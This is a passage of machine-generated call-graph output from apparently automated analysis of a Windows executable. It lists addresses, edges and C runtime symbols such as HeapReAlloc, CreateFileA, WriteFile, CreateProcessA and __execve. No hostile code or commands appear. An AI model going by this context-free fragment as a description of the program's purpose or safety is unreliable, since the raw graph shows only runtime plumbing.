calls 7987 4058e0 7986->7987 7989 404ea7 __encode_pointer 6 API calls 7987->7989 7988 405886 7991 4058aa 7988->7991 7995 4058d2 7988->7995 8012 403a1d 7988->8012 7989->7984 7991->7984 7992 403a1d __realloc_crt 73 API calls 7991->7992 7993 4058c0 7991->7993 7992->7993 7993->7984 7994 404ea7 __encode_pointer 6 API calls 7993->7994 7994->7995 7995->7986 8061 4021d9 7996->8061 8000 4097c7 ___lock_fhandle 7999->8000 8001 4097f4 8000->8001 8002 4097d7 8000->8002 8004 409835 HeapSize 8001->8004 8006 403ef9 __lock 67 API calls 8001->8006 8003 403750 __read 67 API calls 8002->8003 8005 4097dc 8003->8005 8008 4097ec ___lock_fhandle 8004->8008 8007 4036e8 __read 6 API calls 8005->8007 8009 409804 ___sbh_find_block 8006->8009 8007->8008 8008->7988 8017 409855 8009->8017 8015 403a26 8012->8015 8014 403a65 8014->7991 8015->8014 8016 403a46 Sleep 8015->8016 8021 406b8c 8015->8021 8016->8015 8020 403e1f LeaveCriticalSection 8017->8020 8019 409830 8019->8004 8019->8008 8020->8019 8022 406b98 ___lock_fhandle 8021->8022 8023 406bad 8022->8023 8024 406b9f 8022->8024 8025 406bc0 8023->8025 8026 406bb4 8023->8026 8027 406ac2 _malloc 67 API calls 8024->8027 8033 406d32 8025->8033 8056 406bcd ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 8025->8056 8028 403abd __freea 67 API calls 8026->8028 8043 406ba7 ___lock_fhandle _realloc 8027->8043 8028->8043 8029 406d65 8030 405f96 __calloc_impl 6 API calls 8029->8030 8034 406d6b 8030->8034 8031 403ef9 __lock 67 API calls 8031->8056 8032 406d37 HeapReAlloc 8032->8033 8032->8043 8033->8029 8033->8032 8035 406d89 8033->8035 8037 405f96 __calloc_impl 6 API calls 8033->8037 8039 406d7f 8033->8039 8036 403750 __read 67 API calls 8034->8036 8038 403750 __read 67 API calls 8035->8038 8035->8043 8036->8043 8037->8033 8040 406d92 GetLastError 8038->8040 8042 403750 __read 67 API calls 8039->8042 8040->8043 8044 406d00 8042->8044 8043->8015 8044->8043 8046 406d05 GetLastError 8044->8046 8045 406c58 HeapAlloc 8045->8056 8046->8043 8047 406cad HeapReAlloc 8047->8056 8048 407601 ___sbh_alloc_block 5 API calls 8048->8056 8049 406d18 8049->8043 8052 403750 __read 67 API calls 8049->8052 8050 405f96 __calloc_impl 6 API calls 8050->8056 8051 406e52 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 8051->8056 8054 406d25 8052->8054 8053 406cfb 8055 403750 __read 67 API calls 8053->8055 8054->8040 8054->8043 8055->8044 8056->8029 8056->8031 8056->8043 8056->8045 8056->8047 8056->8048 8056->8049 8056->8050 8056->8051 8056->8053 8057 406cd0 8056->8057 8060 403e1f LeaveCriticalSection 8057->8060 8059 406cd7 8059->8056 8060->8059 8064 403e1f LeaveCriticalSection 8061->8064 8063 4021e0 8063->7975 8064->8063 8066 401518 8065->8066 8107 40ca21 8066->8107 8068 40157f 8069 401589 __stbuf 8068->8069 8070 4015bd 8068->8070 8120 4017ca 8069->8120 8143 40c205 8070->8143 8072 4015d1 8173 40a121 8072->8173 8075 4015a1 8076 401ee2 setSBUpLow 5 API calls 8075->8076 8077 4015b6 8076->8077 8077->7130 8078 4015de _strncmp 8196 4011f0 8078->8196 8086 401686 __stbuf 8088 4017ca _fprintf 105 API calls 8086->8088 8087 4016ba 8089 4016ea 8087->8089 8095 401000 67 API calls 8087->8095 8090 401757 8088->8090 8091 401000 67 API calls 8089->8091 8092 401ee2 setSBUpLow 5 API calls 8090->8092 8094 4016f4 8091->8094 8093 40176f 8092->8093 8093->7130 8096 40171f 8094->8096 8097 401000 67 API calls 8094->8097 8095->8087 8098 401731 8096->8098 8099 401776 8096->8099 8097->8094 8232 40bbf4 8098->8232 8241 401410 8099->8241 8104 401790 8105 401ee2 setSBUpLow 5 API calls 8104->8105 8106 4017a3 8105->8106 8106->7130 8108 40ca2d ___lock_fhandle 8107->8108 8109 40ca42 8108->8109 8110 40ca5f 8108->8110 8111 403750 __read 67 API calls 8109->8111 8257 40c302 8110->8257 8114 40ca47 8111->8114 8116 4036e8 __read 6 API calls 8114->8116 8119 40ca57 ___lock_fhandle 8116->8119 8118 403750 __read 67 API calls 8118->8119 8119->8068 8121 4017d6 ___lock_fhandle 8120->8121 8122 4017e9 8121->8122 8124 401815 8121->8124 8123 403750 __read 67 API calls 8122->8123 8125 4017ee 8123->8125 8579 4019bd 8124->8579 8127 4036e8 __read 6 API calls 8125->8127 8134 4017fe ___lock_fhandle 8127->8134 8129 401898 8131 4018c4 8129->8131 8591 40261d 8129->8591 8622 4018dc 8131->8622 8134->8075 8140 403750 __read 67 API calls 8141 401888 8140->8141 8142 4036e8 __read 6 API calls 8141->8142 8142->8129 8144 40c211 ___lock_fhandle 8143->8144 8145 40c234 8144->8145 8146 40c219 8144->8146 8147 40c242 8145->8147 8153 40c283 8145->8153 8148 403763 __read 67 API calls 8146->8148 8150 403763 __read 67 API calls 8147->8150 8149 40c21e 8148->8149 8151 403750 __read 67 API calls 8149->8151 8152 40c247 8150->8152 8163 40c226 ___lock_fhandle 8151->8163 8156 403750 __read 67 API calls 8152->8156 8154 40c290 8153->8154 8155 40c2a4 8153->8155 8157 403763 __read 67 API calls 8154->8157 8158 40a5c9 ___lock_fhandle 68 API calls 8155->8158 8159 40c24e 8156->8159 8160 40c295 8157->8160 8161 40c2aa 8158->8161 8166 4036e8 __read 6 API calls 8159->8166 8162 403750 __read 67 API calls 8160->8162 8164 40c2b7 8161->8164 8165 40c2cd 8161->8165 8162->8159 8163->8072 8638 40bc43 8164->8638 8168 403750 __read 67 API calls 8165->8168 8166->8163 8170 40c2d2 8168->8170 8169 40c2c5 8702 40c2f8 8169->8702 8171 403763 __read 67 API calls 8170->8171 8171->8169 8174 40a12d ___lock_fhandle 8173->8174 8175 40a150 8174->8175 8176 40a135 8174->8176 8177 40a15e 8175->8177 8183 40a19f 8175->8183 8178 403763 __read 67 API calls 8176->8178 8179 403763 __read 67 API calls 8177->8179 8180 40a13a 8178->8180 8182 40a163 8179->8182 8181 403750 __read 67 API calls 8180->8181 8190 40a142 ___lock_fhandle 8181->8190 8184 403750 __read 67 API calls 8182->8184 8185 40a5c9 ___lock_fhandle 68 API calls 8183->8185 8186 40a16a 8184->8186 8187 40a1a5 8185->8187 8191 4036e8 __read 6 API calls 8186->8191 8188 40a1c0 8187->8188 8189 40a1b2 8187->8189 8193 403750 __read 67 API calls 8188->8193 8192 40a085 __close_nolock 70 API calls 8189->8192 8190->8078 8191->8190 8194 40a1ba 8192->8194 8193->8194 8706 40a1e4 8194->8706 8197 401200 8196->8197 8197->8197 8198 401a9b _calloc 67 API calls 8197->8198 8199 401211 8198->8199 8710 401fc9 8199->8710 8201 40122f 8202 401fc9 91 API calls 8201->8202 8204 401248 _memset 8201->8204 8202->8201 8203 401312 8206 4010a0 8203->8206 8204->8203 8205 401fc9 91 API calls 8204->8205 8205->8204 8207 4010cc 8206->8207 8727 401e96 8207->8727 8210 4011b1 8212 401a9b _calloc 67 API calls 8210->8212 8211 401118 8213 401e96 __wsplitpath 77 API calls 8211->8213 8220 401197 _strncpy 8212->8220 8214 401138 8213->8214 8730 401c84 8214->8730 8215 401ee2 setSBUpLow 5 API calls 8216 4011e0 8215->8216 8216->8086 8221 401a9b 8216->8221 8219 401a9b _calloc 67 API calls 8219->8220 8220->8215 8222 403f2c __calloc_impl 67 API calls 8221->8222 8223 401ab5 8222->8223 8224 4016ae 8223->8224 8225 403750 __read 67 API calls 8223->8225 8228 401000 8224->8228 8226 401ac8 8225->8226 8226->8224 8227 403750 __read 67 API calls 8226->8227 8227->8224 8229 401008 8228->8229 8229->8229 8230 401a9b _calloc 67 API calls 8229->8230 8231 401023 _memset 8230->8231 8231->8087 8233 40bc03 8232->8233 8237 40bc20 8232->8237 8234 403750 __read 67 API calls 8233->8234 8235 40bc08 8234->8235 8236 4036e8 __read 6 API calls 8235->8236 8238 40bc18 8236->8238 8237->8233 8239 40bc35 8237->8239 8238->8086 8819 40cb50 8239->8819 8242 401420 8241->8242 8242->8242 8243 401a9b _calloc 67 API calls 8242->8243 8244 40146e 8243->8244 9187 401ff7 8244->9187 8246 4014d2 8249 401350 8246->8249 8247 40147c 8247->8246 8248 401ff7 _sprintf 103 API calls 8247->8248 8248->8247 8250 401ae0 _memset 8249->8250 8251 40137a SetConsoleCtrlHandler CreateProcessA 8250->8251 8252 4013d5 WaitForSingleObject GetExitCodeProcess 8251->8252 8253 4013b9 __stbuf 8251->8253 8252->8253 8254 401406 8252->8254 8255 4017ca _fprintf 105 API calls 8253->8255 8254->8104 8256 4013cc 8255->8256 8256->8104 8258 40c327 8257->8258 8324 40d052 8258->8324 8261 40c348 8262 4035c0 __invoke_watson 10 API calls 8261->8262 8263 40c352 8262->8263 8267 40c355 8263->8267 8264 40c38b 8348 403763 8264->8348 8267->8264 8271 40c44b 8267->8271 8268 403750 __read 67 API calls 8269 40c39a 8268->8269 8270 4036e8 __read 6 API calls 8269->8270 8295 40c3a9 8270->8295 8330 40a690 8271->8330 8273 40c4ed 8274 40c4f4 8273->8274 8275 40c50e CreateFileA 8273->8275 8278 403763 __read 67 API calls 8274->8278 8276 40c5a8 GetFileType 8275->8276 8277 40c53b 8275->8277 8280 40c5b5 GetLastError 8276->8280 8281 40c5f9 8276->8281 8279 40c574 GetLastError 8277->8279 8284 40c54f CreateFileA 8277->8284 8282 40c4f9 8278->8282 8351 403776 8279->8351 8286 403776 __dosmaperr 67 API calls 8280->8286 8356 40a44b 8281->8356 8283 403750 __read 67 API calls 8282->8283 8287 40c503 8283->8287 8284->8276 8284->8279 8288 40c5de CloseHandle 8286->8288 8293 403750 __read 67 API calls 8287->8293 8288->8287 8289 40c5ec 8288->8289 8291 403750 __read 67 API calls 8289->8291 8294 40c5f1 8291->8294 8293->8295 8294->8287 8320 40ca9d 8295->8320 8296 40c91c 8296->8295 8300 40c9a4 CloseHandle CreateFileA 8296->8300 8297 40c671 8365 40cf21 8297->8365 8299 40c6e2 8299->8296 8312 40c68d 8299->8312 8421 40810c 8299->8421 8302 40c8ac 8300->8302 8303 40c9cf GetLastError 8300->8303 8302->8295 8306 403776 __dosmaperr 67 API calls 8303->8306 8304 403763 __read 67 API calls 8304->8312 8305 40bc43 77 API calls __read_nolock 8305->8312 8307 40c9db 8306->8307 8446 40a4cc 8307->8446 8312->8299 8312->8305 8313 40c89f 8312->8313 8315 40c837 8312->8315 8317 40cf21 69 API calls __lseek_nolock 8312->8317 8318 409420 69 API calls __lseeki64_nolock 8312->8318 8375 40a085 8312->8375 8390 40cd6b 8312->8390 8314 40a085 __close_nolock 70 API calls 8313->8314 8316 40c8a6 8314->8316 8315->8296 8319 403750 __read 67 API calls 8316->8319 8317->8312 8318->8312 8319->8302 8321 40caa2 8320->8321 8322 40ca8b 8320->8322 8578 40a669 LeaveCriticalSection 8321->8578 8322->8118 8322->8119 8325 40d061 8324->8325 8326 40c343 8324->8326 8327 403750 __read 67 API calls 8325->8327 8326->8261 8326->8267 8328 40d066 8327->8328 8329 4036e8 __read 6 API calls 8328->8329 8329->8326 8331 40a69c ___lock_fhandle 8330->8331 8332 403e36 __mtinitlocknum 67 API calls 8331->8332 8333 40a6ac 8332->8333 8334 403ef9 __lock 67 API calls 8333->8334 8335 40a6b1 ___lock_fhandle 8333->8335 8345 40a6c0 8334->8345 8335->8273 8336 40a803 8468 40a821 8336->8468 8337 40a799 8339 4039d1 __calloc_crt 67 API calls 8337->8339 8343 40a7a2 8339->8343 8340 40a741 EnterCriticalSection 8342 40a751 LeaveCriticalSection 8340->8342 8340->8345 8341 403ef9 __lock 67 API calls 8341->8345 8342->8345 8343->8336 8458 40a5c9 8343->8458 8345->8336 8345->8337 8345->8340 8345->8341 8347 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8345->8347 8455 40a763 8345->8455 8347->8345 8349 4050f5 __getptd_noexit 67 API calls 8348->8349 8350 403768 8349->8350 8350->8268 8352 403763 __read 67 API calls 8351->8352 8353 403781 _realloc 8352->8353 8354 403750 __read 67 API calls 8353->8354 8355 403794 8354->8355 8355->8287 8357 40a4b2 8356->8357 8358 40a459 8356->8358 8359 403750 __read 67 API calls 8357->8359 8358->8357 8364 40a47d 8358->8364 8360 40a4b7 8359->8360 8362 403763 __read 67 API calls 8360->8362 8361 40a4a8 8361->8296 8361->8297 8361->8299 8362->8361 8363 40a4a2 SetStdHandle 8363->8361 8364->8361 8364->8363 8477 40a552 8365->8477 8367 40cf30 8368 40cf46 SetFilePointer 8367->8368 8369 40cf36 8367->8369 8371 40cf65 8368->8371 8372 40cf5d GetLastError 8368->8372 8370 403750 __read 67 API calls 8369->8370 8373 40c67e 8370->8373 8371->8373 8374 403776 __dosmaperr 67 API calls 8371->8374 8372->8371 8373->8304 8373->8312 8374->8373 8376 40a552 __lseeki64_nolock 67 API calls 8375->8376 8378 40a095 8376->8378 8377 40a0eb 8380 40a4cc __free_osfhnd 68 API calls 8377->8380 8378->8377 8379 40a0c9 8378->8379 8381 40a552 __lseeki64_nolock 67 API calls 8378->8381 8379->8377 8382 40a552 __lseeki64_nolock 67 API calls 8379->8382 8383 40a0f3 8380->8383 8384 40a0c0 8381->8384 8385 40a0d5 CloseHandle 8382->8385 8386 40a115 8383->8386 8389 403776 __dosmaperr 67 API calls 8383->8389 8387 40a552 __lseeki64_nolock 67 API calls 8384->8387 8385->8377 8388 40a0e1 GetLastError 8385->8388 8386->8312 8387->8379 8388->8377 8389->8386 8490 409420 8390->8490 8393 40cded 8394 403750 __read 67 API calls 8393->8394 8396 40cdf8 8393->8396 8394->8396 8395 409420 __lseeki64_nolock 69 API calls 8398 40cda6 8395->8398 8396->8312 8397 40ce88 8402 409420 __lseeki64_nolock 69 API calls 8397->8402 8418 40cef1 8397->8418 8398->8393 8398->8397 8399 40cdcc GetProcessHeap HeapAlloc 8398->8399 8400 40cde8 8399->8400 8407 40cdff __setmode_nolock 8399->8407 8403 403750 __read 67 API calls 8400->8403 8401 409420 __lseeki64_nolock 69 API calls 8401->8393 8404 40cea1 8402->8404 8403->8393 8404->8393 8405 40a552 __lseeki64_nolock 67 API calls 8404->8405 8406 40ceb7 SetEndOfFile 8405->8406 8408 40ced4 8406->8408 8406->8418 8411 40ce6b 8407->8411 8415 40ce42 __setmode_nolock 8407->8415 8500 4079d9 8407->8500 8410 403750 __read 67 API calls 8408->8410 8412 40ced9 8410->8412 8413 403763 __read 67 API calls 8411->8413 8414 403763 __read 67 API calls 8412->8414 8416 40ce70 8413->8416 8417 40cee4 GetLastError 8414->8417 8419 40ce50 GetProcessHeap HeapFree 8415->8419 8416->8415 8420 403750 __read 67 API calls 8416->8420 8417->8418 8418->8393 8418->8401 8419->8418 8420->8415 8422 408118 ___lock_fhandle 8421->8422 8423 408120 8422->8423 8424 40813b 8422->8424 8425 403763 __read 67 API calls 8423->8425 8426 408149 8424->8426 8429 40818a 8424->8429 8427 408125 8425->8427 8428 403763 __read 67 API calls 8426->8428 8430 403750 __read 67 API calls 8427->8430 8431 40814e 8428->8431 8432 40a5c9 ___lock_fhandle 68 API calls 8429->8432 8441 40812d ___lock_fhandle 8430->8441 8433 403750 __read 67 API calls 8431->8433 8434 408190 8432->8434 8435 408155 8433->8435 8436 4081b3 8434->8436 8437 40819d 8434->8437 8438 4036e8 __read 6 API calls 8435->8438 8440 403750 __read 67 API calls 8436->8440 8439 4079d9 __write_nolock 99 API calls 8437->8439 8438->8441 8442 4081ab 8439->8442 8443 4081b8 8440->8443 8441->8299 8574 4081de 8442->8574 8444 403763 __read 67 API calls 8443->8444 8444->8442 8447 40a538 8446->8447 8448 40a4dd 8446->8448 8449 403750 __read 67 API calls 8447->8449 8448->8447 8453 40a508 8448->8453 8450 40a53d 8449->8450 8451 403763 __read 67 API calls 8450->8451 8452 40a52e 8451->8452 8452->8302 8453->8452 8454 40a528 SetStdHandle 8453->8454 8454->8452 8471 403e1f LeaveCriticalSection 8455->8471 8457 40a76a 8457->8345 8459 40a5d5 ___lock_fhandle 8458->8459 8460 40a630 8459->8460 8463 403ef9 __lock 67 API calls 8459->8463 8461 40a652 ___lock_fhandle 8460->8461 8462 40a635 EnterCriticalSection 8460->8462 8461->8336 8462->8461 8464 40a601 8463->8464 8465 40a618 8464->8465 8467 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8464->8467 8472 40a660 8465->8472 8467->8465 8476 403e1f LeaveCriticalSection 8468->8476 8470 40a828 8470->8335 8471->8457 8475 403e1f LeaveCriticalSection 8472->8475 8474 40a667 8474->8460 8475->8474 8476->8470 8478 40a577 8477->8478 8479 40a55f 8477->8479 8482 403763 __read 67 API calls 8478->8482 8484 40a5bc 8478->8484 8480 403763 __read 67 API calls 8479->8480 8481 40a564 8480->8481 8483 403750 __read 67 API calls 8481->8483 8485 40a5a5 8482->8485 8486 40a56c 8483->8486 8484->8367 8487 403750 __read 67 API calls 8485->8487 8486->8367 8488 40a5ac 8487->8488 8489 4036e8 __read 6 API calls 8488->8489 8489->8484 8491 40a552 __lseeki64_nolock 67 API calls 8490->8491 8492 40943e 8491->8492 8493 409446 8492->8493 8494 409457 SetFilePointer 8492->8494 8495 403750 __read 67 API calls 8493->8495 8496 40946f GetLastError 8494->8496 8498 40944b 8494->8498 8495->8498 8497 409479 8496->8497 8496->8498 8499 403776 __dosmaperr 67 API calls 8497->8499 8498->8393 8498->8395 8499->8498 8501 4079e8 __write_nolock 8500->8501 8502 407a41 8501->8502 8503 407a1a 8501->8503 8533 407a0f 8501->8533 8506 407aa9 8502->8506 8507 407a83 8502->8507 8505 403763 __read 67 API calls 8503->8505 8504 401ee2 setSBUpLow 5 API calls 8508 40810a 8504->8508 8509 407a1f 8505->8509 8511 407abd 8506->8511 8514 409420 __lseeki64_nolock 69 API calls 8506->8514 8510 403763 __read 67 API calls 8507->8510 8508->8407 8512 403750 __read 67 API calls 8509->8512 8513 407a88 8510->8513 8559 40659d 8511->8559 8515 407a26 8512->8515 8517 403750 __read 67 API calls 8513->8517 8514->8511 8518 4036e8 __read 6 API calls 8515->8518 8521 407a91 8517->8521 8518->8533 8519 407ac8 8520 407d6e 8519->8520 8525 40516e __getptd 67 API calls 8519->8525 8523 40803d WriteFile 8520->8523 8524 407d7e 8520->8524 8522 4036e8 __read 6 API calls 8521->8522 8522->8533 8528 408070 GetLastError 8523->8528 8529 407d50 8523->8529 8526 407e5c 8524->8526 8549 407d92 8524->8549 8527 407ae3 GetConsoleMode 8525->8527 8548 407f3c 8526->8548 8551 407e6b 8526->8551 8527->8520 8531 407b0e 8527->8531 8528->8529 8530 4080bb 8529->8530 8529->8533 8535 40808e 8529->8535 8530->8533 8534 403750 __read 67 API calls 8530->8534 8531->8520 8532 407b20 GetConsoleCP 8531->8532 8532->8529 8557 407b43 8532->8557 8533->8504 8537 4080de 8534->8537 8539 408099 8535->8539 8540 4080ad 8535->8540 8536 407e00 WriteFile 8536->8528 8536->8549 8544 403763 __read 67 API calls 8537->8544 8538 407fa2 WideCharToMultiByte 8538->8528 8541 407fd9 WriteFile 8538->8541 8545 403750 __read 67 API calls 8539->8545 8543 403776 __dosmaperr 67 API calls 8540->8543 8547 408010 GetLastError 8541->8547 8541->8548 8542 407ee0 WriteFile 8542->8528 8542->8551 8543->8533 8544->8533 8546 40809e 8545->8546 8550 403763 __read 67 API calls 8546->8550 8547->8548 8548->8529 8548->8530 8548->8538 8548->8541 8549->8529 8549->8530 8549->8536 8550->8533 8551->8529 8551->8530 8551->8542 8553 407bef WideCharToMultiByte 8553->8529 8555 407c20 WriteFile 8553->8555 8554 40a3fb 79 API calls __fassign 8554->8557 8555->8528 8555->8557 8556 40a21f 11 API calls __putwch_nolock 8556->8557 8557->8528 8557->8529 8557->8553 8557->8554 8557->8556 8558 407c74 WriteFile 8557->8558 8568 40686c 8557->8568 8558->8528 8558->8557 8560 4065b9 8559->8560 8561 4065aa 8559->8561 8563 403750 __read 67 API calls 8560->8563 8566 4065dd 8560->8566 8562 403750 __read 67 API calls 8561->8562 8564 4065af 8562->8564 8565 4065cd 8563->8565 8564->8519 8567 4036e8 __read 6 API calls 8565->8567 8566->8519 8567->8566 8571 406834 8568->8571 8572 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8571->8572 8573 406847 8572->8573 8573->8557 8577 40a669 LeaveCriticalSection 8574->8577 8576 4081e6 8576->8441 8577->8576 8578->8322 8580 4019f1 EnterCriticalSection 8579->8580 8581 4019cf 8579->8581 8583 40181e 8580->8583 8581->8580 8582 4019d7 8581->8582 8584 403ef9 __lock 67 API calls 8582->8584 8583->8129 8585 40357f 8583->8585 8584->8583 8586 40358e 8585->8586 8588 40182e 8585->8588 8587 403750 __read 67 API calls 8586->8587 8589 403593 8587->8589 8588->8129 8588->8140 8590 4036e8 __read 6 API calls 8589->8590 8590->8588 8592 40357f __fileno 67 API calls 8591->8592 8593 40262c 8592->8593 8594 40659d __stbuf 67 API calls 8593->8594 8596 402632 __stbuf 8594->8596 8595 4018aa 8598 402793 8595->8598 8596->8595 8597 40398c __malloc_crt 67 API calls 8596->8597 8597->8595 8599 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8598->8599 8600 4027fa 8599->8600 8601 4027fe 8600->8601 8604 40357f __fileno 67 API calls 8600->8604 8616 40283f __output_l __aulldvrm _strlen 8600->8616 8602 403750 __read 67 API calls 8601->8602 8603 402803 8602->8603 8605 4036e8 __read 6 API calls 8603->8605 8604->8616 8606 402815 8605->8606 8607 401ee2 setSBUpLow 5 API calls 8606->8607 8608 4018ba 8607->8608 8618 4026b9 8608->8618 8609 406834 __isleadbyte_l 77 API calls 8609->8616 8610 4026ed 101 API calls _write_multi_char 8610->8616 8611 403abd __freea 67 API calls 8611->8616 8612 402720 101 API calls _write_multi_char 8612->8616 8613 404f22 6 API calls __decode_pointer 8613->8616 8614 406817 79 API calls __cftof 8614->8616 8615 40398c __malloc_crt 67 API calls 8615->8616 8616->8601 8616->8606 8616->8609 8616->8610 8616->8611 8616->8612 8616->8613 8616->8614 8616->8615 8617 402746 101 API calls _write_string 8616->8617 8617->8616 8619 4026c4 8618->8619 8621 4026d7 8618->8621 8619->8621 8625 403bea 8619->8625 8621->8131 8631 401a30 8622->8631 8624 4018e4 8624->8134 8626 403c03 8625->8626 8627 403c25 8625->8627 8626->8627 8628 40357f __fileno 67 API calls 8626->8628 8627->8621 8629 403c1e 8628->8629 8630 40810c __locking 101 API calls 8629->8630 8630->8627 8632 401a60 LeaveCriticalSection 8631->8632 8633 401a41 8631->8633 8632->8624 8633->8632 8634 401a48 8633->8634 8637 403e1f LeaveCriticalSection 8634->8637 8636 401a5d 8636->8624 8637->8636 8639 40bc7a 8638->8639 8640 40bc5f 8638->8640 8642 40bc89 8639->8642 8644 40bcb0 8639->8644 8641 403763 __read 67 API calls 8640->8641 8643 40bc64 8641->8643 8645 403763 __read 67 API calls 8642->8645 8647 403750 __read 67 API calls 8643->8647 8646 40bccf 8644->8646 8660 40bce3 8644->8660 8648 40bc8e 8645->8648 8649 403763 __read 67 API calls 8646->8649 8661 40bc6c 8647->8661 8651 403750 __read 67 API calls 8648->8651 8653 40bcd4 8649->8653 8650 40bd3b 8652 403763 __read 67 API calls 8650->8652 8654 40bc95 8651->8654 8655 40bd40 8652->8655 8656 403750 __read 67 API calls 8653->8656 8657 4036e8 __read 6 API calls 8654->8657 8658 403750 __read 67 API calls 8655->8658 8659 40bcdb 8656->8659 8657->8661 8658->8659 8663 4036e8 __read 6 API calls 8659->8663 8660->8650 8660->8661 8662 40bd17 8660->8662 8664 40bd5c 8660->8664 8661->8169 8662->8650 8669 40bd22 ReadFile 8662->8669 8663->8661 8666 40398c __malloc_crt 67 API calls 8664->8666 8670 40bd72 8666->8670 8667 40c1c9 GetLastError 8671 40c1d6 8667->8671 8672 40c04f 8667->8672 8668 40be4e 8668->8667 8675 40be62 8668->8675 8669->8667 8669->8668 8673 40bd98 8670->8673 8674 40bd7a 8670->8674 8677 403750 __read 67 API calls 8671->8677 8680 403776 __dosmaperr 67 API calls 8672->8680 8685 40bfd4 8672->8685 8676 409420 __lseeki64_nolock 69 API calls 8673->8676 8678 403750 __read 67 API calls 8674->8678 8675->8685 8695 40be7e 8675->8695 8696 40c094 8675->8696 8676->8669 8679 40c1db 8677->8679 8681 40bd7f 8678->8681 8682 403763 __read 67 API calls 8679->8682 8680->8685 8683 403763 __read 67 API calls 8681->8683 8682->8685 8683->8661 8684 403abd __freea 67 API calls 8684->8661 8685->8661 8685->8684 8686 40c10c ReadFile 8689 40c12b GetLastError 8686->8689 8686->8696 8687 40bee4 ReadFile 8688 40bf02 GetLastError 8687->8688 8687->8695 8688->8695 8689->8696 8691 40c049 GetLastError 8691->8672 8692 40bf61 8692->8685 8693 40bfdc 8692->8693 8694 40bfcf 8692->8694 8698 40bf99 MultiByteToWideChar 8692->8698 8693->8698 8701 409420 __lseeki64_nolock 69 API calls 8693->8701 8697 403750 __read 67 API calls 8694->8697 8695->8687 8695->8692 8699 409420 __lseeki64_nolock 69 API calls 8695->8699 8696->8685 8696->8686 8700 409420 __lseeki64_nolock 69 API calls 8696->8700 8697->8685 8698->8685 8698->8691 8699->8695 8700->8696 8701->8698 8705 40a669 LeaveCriticalSection 8702->8705 8704 40c300 8704->8163 8705->8704 8709 40a669 LeaveCriticalSection 8706->8709 8708 40a1ec 8708->8190 8709->8708 8711 401fd7 8710->8711 8712 401fe9 8710->8712 8711->8201 8715 401f78 8712->8715 8716 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8715->8716 8717 401f8b 8716->8717 8718 401fa5 8717->8718 8720 405444 8717->8720 8718->8201 8721 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8720->8721 8722 405458 8721->8722 8723 405465 8722->8723 8724 406834 __isleadbyte_l 77 API calls 8722->8724 8723->8718 8725 40548d 8724->8725 8726 408b4c ___crtGetStringTypeA 91 API calls 8725->8726 8726->8723 8733 401ca4 8727->8733 8792 4041ef 8730->8792 8734 401d35 8733->8734 8738 401cb8 8733->8738 8735 403750 __read 67 API calls 8734->8735 8736 401e4c 8735->8736 8737 4036e8 __read 6 API calls 8736->8737 8739 4010ff 8736->8739 8737->8739 8738->8734 8742 401d27 8738->8742 8754 40437c 8738->8754 8739->8210 8739->8211 8741 404364 __wincmdln 77 API calls 8741->8742 8742->8741 8750 401da0 8742->8750 8752 401d7f 8742->8752 8743 401e02 8743->8734 8743->8739 8744 401e75 8743->8744 8747 40437c __cftof 77 API calls 8744->8747 8745 401dbd 8745->8734 8746 401dd8 8745->8746 8748 40437c __cftof 77 API calls 8745->8748 8746->8734 8746->8739 8749 401dec 8746->8749 8747->8739 8748->8746 8751 40437c __cftof 77 API calls 8749->8751 8750->8743 8750->8745 8751->8739 8752->8734 8752->8750 8753 40437c __cftof 77 API calls 8752->8753 8753->8750 8757 408379 8754->8757 8758 40838d 8757->8758 8759 408391 8758->8759 8760 4083c4 8758->8760 8761 403750 __read 67 API calls 8759->8761 8776 404394 8759->8776 8763 4083f3 8760->8763 8764 4083d5 8760->8764 8760->8776 8762 4083ab 8761->8762 8765 4036e8 __read 6 API calls 8762->8765 8767 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8763->8767 8766 403750 __read 67 API calls 8764->8766 8765->8776 8768 4083dc 8766->8768 8769 4083fe 8767->8769 8770 4036e8 __read 6 API calls 8768->8770 8771 408406 8769->8771 8773 40841b 8769->8773 8770->8776 8772 408eb6 __NMSG_WRITE 67 API calls 8771->8772 8772->8776 8774 408457 8773->8774 8775 40851f 8773->8775 8778 408496 8774->8778 8779 408489 8774->8779 8789 40434b 8774->8789 8775->8776 8777 408550 8775->8777 8781 40434b __mbsnbcpy_s_l 77 API calls 8775->8781 8776->8742 8777->8776 8784 403750 __read 67 API calls 8777->8784 8780 4084f6 8778->8780 8786 40849c 8778->8786 8779->8777 8779->8778 8783 403750 __read 67 API calls 8780->8783 8781->8775 8785 4084fd 8783->8785 8784->8776 8787 4036e8 __read 6 API calls 8785->8787 8786->8776 8788 40434b __mbsnbcpy_s_l 77 API calls 8786->8788 8787->8776 8788->8786 8790 4042f8 x_ismbbtype_l 77 API calls 8789->8790 8791 40435f 8790->8791 8791->8774 8793 404201 8792->8793 8794 404206 8792->8794 8793->8794 8800 404226 8793->8800 8795 403750 __read 67 API calls 8794->8795 8796 40420b 8795->8796 8797 4036e8 __read 6 API calls 8796->8797 8798 40118b 8797->8798 8798->8219 8799 403750 __read 67 API calls 8799->8796 8801 404276 8800->8801 8803 408362 8800->8803 8801->8798 8801->8799 8806 4082c9 8803->8806 8807 4082f5 8806->8807 8808 4082d9 8806->8808 8810 408317 8807->8810 8811 4082fd 8807->8811 8809 403750 __read 67 API calls 8808->8809 8812 4082de 8809->8812 8814 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8810->8814 8818 4082ee 8810->8818 8813 403750 __read 67 API calls 8811->8813 8815 4036e8 __read 6 API calls 8812->8815 8816 408302 8813->8816 8814->8818 8815->8818 8817 4036e8 __read 6 API calls 8816->8817 8817->8818 8818->8801 8820 40cb86 8819->8820 8821 40cb66 8819->8821 8820->8821 8825 40cb9b 8820->8825 8822 403750 __read 67 API calls 8821->8822 8823 40cb6b 8822->8823 8824 4036e8 __read 6 API calls 8823->8824 8843 40cb7b 8824->8843 8869 40d7b8 8825->8869 8828 40d7b8 __execve 77 API calls 8829 40cbae 8828->8829 8857 40cc2f 8829->8857 8872 40bb06 8829->8872 8830 40d7b8 __execve 77 API calls 8832 40cc50 8830->8832 8833 40cc82 _strlen 8832->8833 